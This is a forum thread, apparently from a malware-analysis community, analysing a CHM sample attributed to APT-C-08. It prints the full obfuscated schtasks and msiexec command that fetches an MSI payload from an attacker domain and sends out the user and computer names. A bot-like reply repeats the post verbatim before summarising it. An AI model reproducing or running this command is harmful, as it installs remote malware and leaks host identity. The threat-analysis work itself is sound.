Malware Analysis APT-C-08 CHM Malicious

[ShenguiTurmi]

APT-C-08 is an APT organisation from India that mainly targets industrial/power/government sectors in China and Pakistan.
(The above introduction is from Qihoo, I am not responsible for the accuracy of the above introduction.)

hash:c3fc4d145ce3cee06782753be269cad6632751fb9b824e1917b0de6e597ee2ee
Triage:Triage | Malware sandboxing report by Hatching Triage
Hybrid-Analysis:Free Automated Malware Analysis Service - powered by Falcon Sandbox

After the sample has run they add a scheduled task and then try to download the final payload (in msi format) from that address:
hxxp://mercifulnearyou(dot)com/FMCG/oli(dot)php
Here is the full shellcode (change "(xx)" to tt):
schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% /^q^n ^/^norestart" /f

From observation, they turn off downloads the vast majority of the time (they can only download empty 0byte files), and they only turn them on when they realise that the exact target has taken the bait.
Since there was no real target on the hook at this point, I couldn't get the full payload, so I didn't know the C2 address.

 

[Bot]

APT-C-08 is an APT organisation from India that mainly targets industrial/power/government sectors in China and Pakistan.
(The above introduction is from Qihoo, I am not responsible for the accuracy of the above introduction.)

hash:c3fc4d145ce3cee06782753be269cad6632751fb9b824e1917b0de6e597ee2ee
Triage:Triage | Malware sandboxing report by Hatching Triage
Hybrid-Analysis:Free Automated Malware Analysis Service - powered by Falcon Sandbox

After the sample has run they add a scheduled task and then try to download the final payload (in msi format) from that address:
hxxp://mercifulnearyou(dot)com/FMCG/oli(dot)php
Here is the full shellcode (change "(xx)" to tt):
schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% /^q^n ^/^norestart" /f

From observation, they turn off downloads the vast majority of the time (they can only download empty 0byte files), and they only turn them on when they realise that the exact target has taken the bait.
Since there was no real target on the hook at this point, I couldn't get the full payload, so I didn't know the C2 address.

Thank you for sharing this information about APT-C-08 and the specific sample you analyzed. It's important to raise awareness about such targeted attacks. Based on the provided shellcode, it seems that the attackers are creating a scheduled task that runs every 15 minutes. The task attempts to download a final payload in MSI format from the URL specified. However, it appears that the attackers have measures in place to minimize detection, as they only enable downloads when they believe their specific target has taken the bait.

It's unfortunate that you were not able to obtain the full payload or the command and control (C2) address due to the absence of a real target. Malware analysis can be challenging, but even partial information can be valuable in understanding the behavior and techniques used by threat actors. Thank you for sharing your findings, and I hope this information contributes to the continued efforts in combating APT threats.

 

[Sandbox Breaker]

Nice grab!